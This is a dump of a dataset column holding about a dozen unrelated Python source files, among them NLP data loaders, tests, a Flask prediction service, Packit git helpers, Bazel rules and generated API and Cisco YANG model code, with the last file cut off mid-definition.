text
stringlengths 2
999k
|
|---|
"""
Contains I/O functions
"""
import numpy
import theano
import logging
import sys
import tempfile
from collections import defaultdict
def build_character_dictionary(path, chars = {}):
with open(path, 'r') as fin:
lineno = 0
for line in fin:
lineno += 1
line = line.strip()
if len(line) == 0:
continue
try:
word, _ = line.split('\t')
for c in word:
if c not in chars:
chars[c] = len(chars) + 1
except ValueError as ex:
print ex, lineno, line
return chars
def build_word_dictionary(path, words = {}):
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
continue
word, _ = line.split('\t')
if word not in words:
words[word] = len(words) + 1
return words
def build_tag_dictionary(path, tags={}):
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
continue
_, tag = line.split('\t')
if tag not in tags:
tags[tag] = len(tags) + 1
return tags
def get_tweet_words(path):
t = defaultdict(list)
c = 0
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
c += 1
continue
word, pos = line.split('\t')
word = word.decode('utf8')
t[c].append(word)
return t
def get_max_word_count(path):
t = get_tweet_words(path)
m = [len(t[c]) for c in t]
m = int(numpy.percentile(m, 99))
#m = int(numpy.median([len(t[c]) for c in t]))
logging.debug("get_max_word_count('%s') = %d", path, m)
return m
def get_max_word_length(path):
t = get_tweet_words(path)
m = 0
d = []
for c in t:
for w in t[c]:
d.append(len(w))
if len(w) >= m:
m = len(w)
logging.debug('length: %s, %d', w, m)
m = numpy.percentile(d, 99)
logging.debug("get_max_word_length('%s') = %d", path, m)
return m
def get_max_length(path):
t = get_tweet_words(path)
t = {c: u"".join(t[c]) for c in t}
m = max([len(t[c]) for c in t])
logging.debug('get_max_length(%s) = %d', path, m)
return m
def load_pos_tagged_data(path, chardict = {}, worddict={}, posdict={}, overlap=15, allow_append=True):
if allow_append:
build_character_dictionary(path, chardict)
build_word_dictionary(path, worddict)
build_tag_dictionary(path, posdict)
cur_chars, cur_words, cur_labels = [], [], []
words, chars, labels = [], [], []
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
chars.append(cur_chars[:-1])
words.append(cur_words[:-1])
labels.append(cur_labels)
cur_chars = []
cur_labels = []
cur_words = []
continue
word, pos = line.split('\t')
if word not in worddict and allow_append:
worddict[word] = len(worddict)+1
for c in word:
if c not in chardict and allow_append:
chardict[c] = len(chardict)+1
if c in chardict:
cur_chars.append(chardict[c])
else:
cur_chars.append(0)
if word in worddict:
cur_words.append(worddict[word])
else:
cur_words.append(0)
if pos not in posdict and allow_append:
posdict[pos] = len(posdict)+1
if pos in posdict:
cur_labels.append(posdict[pos])
else:
cur_labels.append(0)
if word in worddict:
cur_words.append(worddict[word])
else:
cur_words.append(0)
cur_chars.append(0)
if len(cur_chars) > 0:
chars.append(cur_chars)
words.append(cur_words)
labels.append(cur_labels)
return chars, words, labels
def string_to_unprepared_format(text, chardict, worddict):
with open('sample.conll', 'wb') as fp:
for word in text.split():
#if word not in worddict:
# raise Exception((word, "not in dictionary"))
line = '%s\t?\n' % (word,)
fp.write(line)
# print >> fp, "%s\t?" % (word,)
chars, words, labels = load_pos_tagged_data("sample.conll", chardict, worddict, {'?': 0}, False)
return [], chars, words, labels
def prepare_data(char_seqs, labels, maxw, maxwlen, dim_proj):
"""
Create the matrices from the datasets.
This pad each sequence to the same length: the length of the
longest sequence or maxlen.
if maxlen is set, we will cut all sequences to this maximum
length
This swap the axis!
"""
# x: a list of sentences
n_samples = len(char_seqs)
x_c = numpy.zeros((maxw, maxwlen, n_samples)).astype('int8')
x_mask = numpy.zeros((maxw, maxwlen, n_samples, dim_proj)).astype(theano.config.floatX)
y = numpy.zeros((maxw, n_samples)).astype('int8')
y_mask = numpy.zeros((maxw, n_samples)).astype('int8')
for idx, (s_c, l) in enumerate(zip(char_seqs, labels)):
# idx is the current position in the mini-batch
# s_c is a list of characters
# s_w is a list of words
# l is a list of labels
c = 0
p = 0
warning = None
for j, a in enumerate(s_c):
# j is the current character in this tweet
# idx is the current tweet in this minibatch
# c is the current word (can be up to 16)
# p is the current character in this word
if a == 0:
# This current character is a space
# Increase the word count and continue
c += 1
p = 0
j += 1 # Temporarily skip to next loop char
if c >= maxw:
if j != len(s_c):
warning = "truncation: too many words in this tweet! {}-{}".format(j, len(s_c))
break
if c >= len(l):
if j != len(s_c):
warning = "truncation: too many words for these labels {}-{}".format(j, len(s_c))
break
if p >= x_c.shape[1]:
warning = "truncation: too many characters for this maxwlen"
else:
x_c[c, p, idx] = a
x_mask[c, p, idx] = numpy.ones(dim_proj)
y[c, idx] = l[c]
y_mask[c, idx] = 1
p += 1
if warning is not None:
#logging.warning("%s", warning)
pass
return x_c, x_mask, y, y_mask
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.biomass import biomass
def test_biomass():
"""Test module biomass.py by downloading
biomass.csv and testing shape of
extracted data has 153 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = biomass(test_path)
try:
assert x_train.shape == (153, 8)
except:
shutil.rmtree(test_path)
raise()
|
#!/usr/bin/python
# Filename: monitor-example.py
import os
import sys
# Import MobileInsight modules
from mobile_insight.monitor import OnlineMonitor
from mobile_insight.analyzer import MsgLogger
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Error: please specify physical port name and baudrate.")
print((__file__, "SERIAL_PORT_NAME BAUNRATE"))
sys.exit(1)
# Initialize a 3G/4G monitor
src = OnlineMonitor()
src.set_serial_port(sys.argv[1]) # the serial port to collect the traces
src.set_baudrate(int(sys.argv[2])) # the baudrate of the port
# Save the monitoring results as an offline log
src.save_log_as("./monitor-example.mi2log")
# print("finish config")
# Enable 3G/4G messages to be monitored. Here we enable RRC (radio
# resource control) monitoring
# src.enable_log("LTE_RRC_OTA_Packet")
# src.enable_log("WCDMA_RRC_OTA_Packet")
# src.enable_log("WCDMA_RRC_Serv_Cell_Info")
# print("finish enable")
# Dump the messages to std I/O. Comment it if it is not needed.
dumper = MsgLogger()
dumper.set_source(src)
dumper.set_decoding(MsgLogger.XML) # decode the message as xml
# Start the monitoring
src.run()
|
"""Adds repostories/archives."""
########################################################################
# DO NOT EDIT THIS FILE unless you are inside the
# https://github.com/3rdparty/bazel-rules-curl repository. If you
# encounter it anywhere else it is because it has been copied there in
# order to simplify adding transitive dependencies. If you want a
# different version of bazel-rules-curl follow the Bazel build
# instructions at https://github.com/3rdparty/bazel-rules-curl.
########################################################################
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def repos(external = True, repo_mapping = {}):
if "rules_foreign_cc" not in native.existing_rules():
http_archive(
name = "rules_foreign_cc",
url = "https://github.com/bazelbuild/rules_foreign_cc/archive/0.5.1.tar.gz",
sha256 = "33a5690733c5cc2ede39cb62ebf89e751f2448e27f20c8b2fbbc7d136b166804",
strip_prefix = "rules_foreign_cc-0.5.1",
repo_mapping = repo_mapping,
)
if external and "com_github_4rdparty_bazel_rules_libcurl" not in native.existing_rules():
http_archive(
name = "com_github_4rdparty_bazel_rules_libcurl",
url = "https://github.com/4rdparty/bazel-rules-libcurl/archive/refs/tags/libcurl-7_78_0.tar.gz",
sha256 = "8de476145536ded8df4aacf98f3d5511721d291f78568c1873bab8a080a4e985",
strip_prefix = "bazel-rules-libcurl-libcurl-7_78_0",
repo_mapping = repo_mapping,
)
|
from __future__ import absolute_import, unicode_literals
from setuptools import setup, find_packages
VERSION = '0.1.0'
NAME = 'pinsage-pytorch'
DESCRIPTION = 'This is a PinSage pytorch library.'
URL = 'https://github.com/rlji/pinsage-pytorch'
EMAIL = 'me@example.com'
AUTHOR = 'rlji'
# What python versions are supported?
REQUIRES_PYTHON = ">=3.6"
# What packages are required for this module to be executed?
REQUIRED = [
'dgl', 'pandas',
'dask[complete]',
'torch', 'numpy',
'scipy', 'tqdm',
]
# What packages are optional?
EXTRAS = {
}
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=["tests"]),
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
)
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import logging
import re
import subprocess
import tempfile
from pathlib import Path
from typing import Tuple, Optional, Union, List
import git
import yaml
from ogr.parsing import RepoUrl, parse_git_repo
from packit.exceptions import PackitException
logger = logging.getLogger(__name__)
class RepositoryCache:
"""
Cache for git repositories base on the reference option of `git clone`.
* The cache is located in the specified directory
and contains separate git repository for each project.
* Project name is used to match the git project in the cache.
"""
def __init__(self, cache_path: Union[str, Path], add_new=False) -> None:
self.cache_path = (
Path(cache_path) if isinstance(cache_path, str) else cache_path
)
self.add_new = add_new
logger.debug(
f"Instantiation of the repository cache at {self.cache_path}. "
f"New projects will {'not ' if not self.add_new else ''}be added."
)
@property
def cached_projects(self) -> List[str]:
"""Project names we have in the cache."""
if not self.cache_path.is_dir():
self.cache_path.mkdir(parents=True)
return [f.name for f in self.cache_path.iterdir() if f.is_dir()]
def _clone(self, **kwargs) -> git.Repo:
"""Wrapper around git function so we are able to check the call in tests more easily."""
return git.repo.Repo.clone_from(**kwargs)
def get_repo(
self,
url: str,
directory: Union[Path, str] = None,
) -> git.Repo:
"""
Clone the repository.
* If we have this repository in a cache, use the cached repo as a reference when cloning.
* If we don't have this repository in a cache and {add_new} is True,
clone the repository to cache first and then use it as a reference.
:param url: will be used to clone the repo
:param directory: target path for cloning the repository
:return: cloned repository
"""
directory = str(directory) if directory else tempfile.mkdtemp()
if is_git_repo(directory=directory):
logger.debug(f"Repo already exists in {directory}.")
return git.repo.Repo(directory)
logger.debug(
f"Cloning repo {url} -> {directory} using repository cache at {self.cache_path}"
)
cached_projects = self.cached_projects
cached_projects_str = "\n".join(f"- {project}" for project in cached_projects)
logger.debug(
f"Repositories in the cache ({len(cached_projects)} project(s)):\n{cached_projects_str}"
)
project_name = RepoUrl.parse(url).repo
reference_repo = self.cache_path.joinpath(project_name)
if project_name not in cached_projects and self.add_new:
logger.debug(f"Creating reference repo: {reference_repo}")
self._clone(url=url, to_path=str(reference_repo), tags=True)
if self.add_new or project_name in cached_projects:
logger.debug(f"Using reference repo: {reference_repo}")
return self._clone(
url=url, to_path=directory, tags=True, reference=str(reference_repo)
)
return self._clone(url=url, to_path=directory, tags=True)
def is_git_repo(directory: Union[Path, str]) -> bool:
"""
Test, if the directory is a git repo.
(Has .git subdirectory?)
"""
return Path(directory, ".git").is_dir()
def get_repo(url: str, directory: Union[Path, str] = None) -> git.Repo:
"""
Use directory as a git repo or clone repo to the tempdir.
"""
directory = str(directory) if directory else tempfile.mkdtemp()
if is_git_repo(directory=directory):
logger.debug(f"Repo already exists in {directory}.")
repo = git.repo.Repo(directory)
else:
logger.debug(f"Cloning repo {url} -> {directory}")
repo = git.repo.Repo.clone_from(url=url, to_path=directory, tags=True)
return repo
def get_namespace_and_repo_name(url: str) -> Tuple[Optional[str], str]:
parsed_git_repo = parse_git_repo(url)
if parsed_git_repo is None or not parsed_git_repo.repo:
raise PackitException(
f"Invalid URL format, can't obtain namespace and repository name: {url}"
)
return parsed_git_repo.namespace, parsed_git_repo.repo
def is_a_git_ref(repo: git.Repo, ref: str) -> bool:
try:
commit = repo.commit(ref)
return bool(commit)
except git.BadName:
return False
def get_default_branch(repository: git.Repo) -> str:
"""
Returns default branch for newly created repos in the parent directory of
passed in repository. Accepts `repository` to ensure the closest override of
git configuration is used.
Args:
repository (git.Repo): Git repository closest to the directory where
the configuration is applied.
Returns:
Default branch for new repos, if not supported or not configured returns
`master`.
"""
config = repository.config_reader()
return config.get_value("init", "defaultBranch", "master")
def git_remote_url_to_https_url(inp: str) -> str:
"""
turn provided git remote URL to https URL:
returns empty string if the input can't be processed
"""
logger.debug(f"Parsing git remote URL {inp!r} and converting it to https-like URL.")
parsed_repo = parse_git_repo(inp)
if not parsed_repo or not parsed_repo.hostname:
logger.debug(f"{inp!r} is not an URL we recognize.")
return ""
if inp.startswith(("http", "https")):
logger.debug(f"Provided input {inp!r} is an url.")
return inp
optional_suffix = ".git" if inp.endswith(".git") else ""
url_str = "https://{}/{}/{}{}".format(
parsed_repo.hostname, parsed_repo.namespace, parsed_repo.repo, optional_suffix
)
logger.debug(f"URL {inp!r} turned into HTTPS {url_str!r}")
return url_str
def get_current_version_command(
glob_pattern: str, refs: Optional[str] = "tags"
) -> List[str]:
"""
Returns command that find latest git reference matching given pattern.
:param glob_pattern: pattern that is used to find latest ref
:param refs: specifies what kind of ref is used; \
default is `"tags"` that searches through all tags (including non-annotated), \
pass `None` to search only annotated tags or `"all"` to search through \
all refs (including branches and remote refs)
:return: command to find latest ref
"""
return [
"git",
"describe",
"--abbrev=0",
f"--{refs}" if refs else "",
"--match",
glob_pattern,
]
def create_new_repo(cwd: Path, switches: List[str]):
subprocess.check_call(["git", "init"] + switches + [str(cwd)])
# TODO: Replace with -b / --initial-branch in `git init` when possible
if "--bare" not in switches:
subprocess.check_call(["git", "checkout", "-b", "main"], cwd=cwd)
else:
subprocess.check_call(
["git", "symbolic-ref", "HEAD", "refs/heads/main"], cwd=cwd
)
def git_patch_ish(patch: str) -> str:
"""
Massage patch to look like a Git-style patch, so that it can
be passed to 'git patch-id' in order to calculate a patch-id.
:param patch: Patch to transform.
:return: Transformed patch.
"""
# Prettend as if format is 'diff --git'
pattern = re.compile(r"^diff -\w+ ", flags=re.MULTILINE)
repl = r"diff --git "
patch = re.sub(pattern, repl, patch)
# Remove timestamps from comparison lines
pattern = re.compile(r"^((---|\+\+\+) .+)\t\d{4}.+$", flags=re.MULTILINE)
repl = r"\1"
patch = re.sub(pattern, repl, patch)
# Add missing 'diff --git' lines
if "diff --git " not in patch:
# Timestamps (see above) already need to be removed
# for this substitution pattern to work.
pattern = re.compile(r"(\n--- (.+)\n\+\+\+ (.+)\n)")
repl = r"\ndiff --git \2 \3\1"
patch = re.sub(pattern, repl, patch)
return patch
def get_message_from_metadata(metadata: dict, header: Optional[str] = None) -> str:
if not isinstance(metadata, dict):
raise PackitException(
f"We can save only dictionaries to metadata. Not {metadata}"
)
content = (
yaml.dump(metadata, indent=4, default_flow_style=False) if metadata else ""
)
if not header:
return content
return f"{header}\n\n{content}"
def get_metadata_from_message(commit: git.Commit) -> Optional[dict]:
"""
Tries to load yaml format from the git message.
We are skipping first line until
the rest of the content is yaml-loaded to dictionary (yaml object type).
If nothing found, we return None.
Reference:
https://gitpython.readthedocs.io/en/stable/reference.html
?highlight=archive#module-git.objects.commit
e.g.:
I)
key: value
another: value
-> {"key": "value", "another": "value"}
II)
On sentence.
key: value
another: value
-> {"key": "value", "another": "value"}
III)
A lot of
text
before keys.
key: value
another: value
-> {"key": "value", "another": "value"}
IV)
Other values are supported as well:
key:
- first
- second
- third
:param commit: git.Commit object
:return: dict loaded from message if it satisfies the rules above
"""
splitted_message = commit.message.split("\n")
for i in range(len(splitted_message)):
message_part = "\n".join(splitted_message[i:])
try:
loaded_part = yaml.safe_load(message_part)
except yaml.YAMLError:
continue
if isinstance(loaded_part, dict):
return loaded_part
return None
|
# def yetki_sorgula(page):
# def inner(role):
# if role == "admin" :
# print("{0} rolü {1} sayfasına ulaşabilir." .format(page, role))
# else:
# print("{0} rolü {1} sayfasına ulaşamaz." .format(page, role))
# return inner
# user1 = yetki_sorgula('arayüz')
# print(user1("admin"))
def islem(islem_adi):
def toplam(*args):
toplam = 0
for i in args:
toplam+=i
return toplam
def carpma(*args):
carpim = 1
for i in args:
carpim*=i
return carpim
if islem_adi == "toplam":
return toplam
else:
return carpma
toplama = islem("toplam")
print(toplama(1,3,5,7,9))
|
import numpy as np
import pandas as pd
import os
import joblib
def preparedata(df):
x=df.drop("y",axis=1)
y=df["y"]
return x,y
def save_model(model,filename):
model_dir="model"
os.makedirs(model_dir,exist_ok=True)
filepath=os.path.join(model_dir,filename)
joblib.dump(model,filepath)
|
import random
import numpy as np
from typing import Dict, List
from flask import Flask
from flask_restx import Resource, Api
# from numpy import genfromtxt
from ubatch import ubatch_decorator
# from keras.models import load_model
from sklearn.datasets import fetch_20newsgroups
from sklearn.model_selection import train_test_split
from joblib import load
ngd = fetch_20newsgroups(subset="all")
X = ngd.data
y = ngd.target
_, X_test, _, _ = train_test_split(X, y, test_size=0.33)
model = load("xgbregressor.joblib")
# X_test = genfromtxt("xgbregressor_inputs.csv", delimiter=",")
app = Flask(__name__)
api = Api(app)
@ubatch_decorator(max_size=100, timeout=0.01)
def predict(data: List[np.array]) -> List[np.float32]:
return model.predict(np.array(data)) # type: ignore
@api.route("/predict_ubatch")
class BatchPredict(Resource):
def post(self) -> Dict[str, float]:
output = predict.ubatch(random.choice(X_test))
return {"prediction": float(output)}
@api.route("/predict")
class Predict(Resource):
def post(self) -> Dict[str, float]:
output = predict([random.choice(X_test)])[0]
return {"prediction": float(output)}
|
from api.caching.caching_shared import getDatabase
__author__ = 'Michael Pryor'
if __name__ == '__main__':
db = getDatabase()
db.place.remove()
db.geocode.remove()
|
"""
Test for Bradley & Fayyad 1998 initialisation algorithm
"""
import unittest
import numpy as np
from datasets import testloader
from initialisations import bradley as bfinit
import kmeans
# pylint: disable=R0201,W0212
class BfTestSuite(unittest.TestCase):
"""Test suite for B&F"""
def test_code_runs(self):
"""At least prove it runs"""
dataset = testloader.load_iris()
centroids = bfinit.generate(dataset.data, 3)
self.assertEqual((3, 4), centroids.shape)
def test_with_hartigan(self):
"""A tiny dataset which can't possibly work here"""
dataset = testloader.load_hartigan()
with self.assertRaises(ValueError):
bfinit.generate(dataset.data, 3)
def test_find_furthest(self):
"""Find the data point furthest from its cluster center"""
distances = np.array([
[1, 2, 3], # 1
[7, 5, 16], # 5
[7, 26, 4], # 4
[19, 20, 21], # 19
[6, 18, 8] # 6
])
np.testing.assert_equal(bfinit._find_furthest(distances), [3])
np.testing.assert_equal(np.sort(bfinit._find_furthest(distances, 2)),
[3, 4])
np.testing.assert_equal(np.sort(bfinit._find_furthest(distances, 3)),
[1, 3, 4])
def test_with_1_empty(self):
"""Seeds and data known to leave one empty cluster after k_means(),
and thus trigger k_means_mod() to reassign a centroid"""
seeds = np.array([
[5.4, 3.0, 4.5, 1.5],
[6.7, 3.0, 5.0, 1.7],
[5.1, 3.8, 1.5, 0.3], # Doesn't get any data points assigned
])
data = np.array([
# Assigned to 0 but is furthest, so becomes the new 2
[6.4, 2.9, 4.3, 1.3],
[6.3, 3.4, 5.6, 2.4],
[6.8, 3.0, 5.5, 2.1],
[5.0, 2.0, 3.5, 1.0],
[5.8, 2.7, 5.1, 1.9],
])
expected_labels = [2, 1, 1, 0, 0]
expected_centroids = [
[5.4, 2.35, 4.3, 1.45],
[6.55, 3.2, 5.55, 2.25],
[6.4, 2.9, 4.3, 1.3], # The new 2
]
centroids = bfinit._k_means_mod(seeds, data, len(seeds))
labels = kmeans.distance_table(data, centroids).argmin(1)
np.testing.assert_array_equal(labels, expected_labels)
np.testing.assert_array_equal(centroids, expected_centroids)
def _test_with_n_empty(self):
"""Seeds and data known to leave more than one empty cluster
This is left as TODO for now, since no way can I force sklearn to
give me more than one empty cluster.
"""
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ItemRevguard(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'revguard_canceled_csr_prompt_group': 'int',
'revguard_canceled_ivr_prompt_group': 'int',
'revguard_canceled_web_prompt_group': 'int',
'revguard_client_brand': 'int',
'revguard_csr_prompt_group': 'int',
'revguard_ivr_prompt_group': 'int',
'revguard_web_prompt_group': 'int'
}
attribute_map = {
'revguard_canceled_csr_prompt_group': 'revguard_canceled_csr_prompt_group',
'revguard_canceled_ivr_prompt_group': 'revguard_canceled_ivr_prompt_group',
'revguard_canceled_web_prompt_group': 'revguard_canceled_web_prompt_group',
'revguard_client_brand': 'revguard_client_brand',
'revguard_csr_prompt_group': 'revguard_csr_prompt_group',
'revguard_ivr_prompt_group': 'revguard_ivr_prompt_group',
'revguard_web_prompt_group': 'revguard_web_prompt_group'
}
def __init__(self, revguard_canceled_csr_prompt_group=None, revguard_canceled_ivr_prompt_group=None, revguard_canceled_web_prompt_group=None, revguard_client_brand=None, revguard_csr_prompt_group=None, revguard_ivr_prompt_group=None, revguard_web_prompt_group=None): # noqa: E501
"""ItemRevguard - a model defined in Swagger""" # noqa: E501
self._revguard_canceled_csr_prompt_group = None
self._revguard_canceled_ivr_prompt_group = None
self._revguard_canceled_web_prompt_group = None
self._revguard_client_brand = None
self._revguard_csr_prompt_group = None
self._revguard_ivr_prompt_group = None
self._revguard_web_prompt_group = None
self.discriminator = None
if revguard_canceled_csr_prompt_group is not None:
self.revguard_canceled_csr_prompt_group = revguard_canceled_csr_prompt_group
if revguard_canceled_ivr_prompt_group is not None:
self.revguard_canceled_ivr_prompt_group = revguard_canceled_ivr_prompt_group
if revguard_canceled_web_prompt_group is not None:
self.revguard_canceled_web_prompt_group = revguard_canceled_web_prompt_group
if revguard_client_brand is not None:
self.revguard_client_brand = revguard_client_brand
if revguard_csr_prompt_group is not None:
self.revguard_csr_prompt_group = revguard_csr_prompt_group
if revguard_ivr_prompt_group is not None:
self.revguard_ivr_prompt_group = revguard_ivr_prompt_group
if revguard_web_prompt_group is not None:
self.revguard_web_prompt_group = revguard_web_prompt_group
@property
def revguard_canceled_csr_prompt_group(self):
"""Gets the revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
Canceled CSR prompt group # noqa: E501
:return: The revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_csr_prompt_group
@revguard_canceled_csr_prompt_group.setter
def revguard_canceled_csr_prompt_group(self, revguard_canceled_csr_prompt_group):
"""Sets the revguard_canceled_csr_prompt_group of this ItemRevguard.
Canceled CSR prompt group # noqa: E501
:param revguard_canceled_csr_prompt_group: The revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_csr_prompt_group = revguard_canceled_csr_prompt_group
@property
def revguard_canceled_ivr_prompt_group(self):
"""Gets the revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
IVR prompt group # noqa: E501
:return: The revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_ivr_prompt_group
@revguard_canceled_ivr_prompt_group.setter
def revguard_canceled_ivr_prompt_group(self, revguard_canceled_ivr_prompt_group):
"""Sets the revguard_canceled_ivr_prompt_group of this ItemRevguard.
IVR prompt group # noqa: E501
:param revguard_canceled_ivr_prompt_group: The revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_ivr_prompt_group = revguard_canceled_ivr_prompt_group
@property
def revguard_canceled_web_prompt_group(self):
"""Gets the revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
Canceled web prompt group # noqa: E501
:return: The revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_web_prompt_group
@revguard_canceled_web_prompt_group.setter
def revguard_canceled_web_prompt_group(self, revguard_canceled_web_prompt_group):
"""Sets the revguard_canceled_web_prompt_group of this ItemRevguard.
Canceled web prompt group # noqa: E501
:param revguard_canceled_web_prompt_group: The revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_web_prompt_group = revguard_canceled_web_prompt_group
@property
def revguard_client_brand(self):
"""Gets the revguard_client_brand of this ItemRevguard. # noqa: E501
Client brand # noqa: E501
:return: The revguard_client_brand of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_client_brand
@revguard_client_brand.setter
def revguard_client_brand(self, revguard_client_brand):
"""Sets the revguard_client_brand of this ItemRevguard.
Client brand # noqa: E501
:param revguard_client_brand: The revguard_client_brand of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_client_brand = revguard_client_brand
@property
def revguard_csr_prompt_group(self):
"""Gets the revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
CSR prompt group # noqa: E501
:return: The revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_csr_prompt_group
@revguard_csr_prompt_group.setter
def revguard_csr_prompt_group(self, revguard_csr_prompt_group):
"""Sets the revguard_csr_prompt_group of this ItemRevguard.
CSR prompt group # noqa: E501
:param revguard_csr_prompt_group: The revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_csr_prompt_group = revguard_csr_prompt_group
@property
def revguard_ivr_prompt_group(self):
"""Gets the revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
IVR prompt group # noqa: E501
:return: The revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_ivr_prompt_group
@revguard_ivr_prompt_group.setter
def revguard_ivr_prompt_group(self, revguard_ivr_prompt_group):
"""Sets the revguard_ivr_prompt_group of this ItemRevguard.
IVR prompt group # noqa: E501
:param revguard_ivr_prompt_group: The revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_ivr_prompt_group = revguard_ivr_prompt_group
@property
def revguard_web_prompt_group(self):
"""Gets the revguard_web_prompt_group of this ItemRevguard. # noqa: E501
Web prompt group # noqa: E501
:return: The revguard_web_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_web_prompt_group
@revguard_web_prompt_group.setter
def revguard_web_prompt_group(self, revguard_web_prompt_group):
"""Sets the revguard_web_prompt_group of this ItemRevguard.
Web prompt group # noqa: E501
:param revguard_web_prompt_group: The revguard_web_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_web_prompt_group = revguard_web_prompt_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ItemRevguard, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ItemRevguard):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FileSystem.Node.FileSystem_' : {
'meta_info' : _MetaInfoClass('FileSystem.Node.FileSystem_',
False,
[
_MetaInfoClassMember('flags', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flags of file system
''',
'flags',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('free', ATTRIBUTE, 'str' , None, None,
[], [],
''' Free space in the file system in bytes
''',
'free',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('prefixes', ATTRIBUTE, 'str' , None, None,
[], [],
''' Prefixes of file system
''',
'prefixes',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('size', ATTRIBUTE, 'str' , None, None,
[], [],
''' Size of the file system in bytes
''',
'size',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Type of file system
''',
'type',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'file-system',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
'FileSystem.Node' : {
'meta_info' : _MetaInfoClass('FileSystem.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Node name
''',
'node_name',
'Cisco-IOS-XR-shellutil-filesystem-oper', True),
_MetaInfoClassMember('file-system', REFERENCE_LIST, 'FileSystem_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper', 'FileSystem.Node.FileSystem_',
[], [],
''' Available file systems
''',
'file_system',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
'FileSystem' : {
'meta_info' : _MetaInfoClass('FileSystem',
False,
[
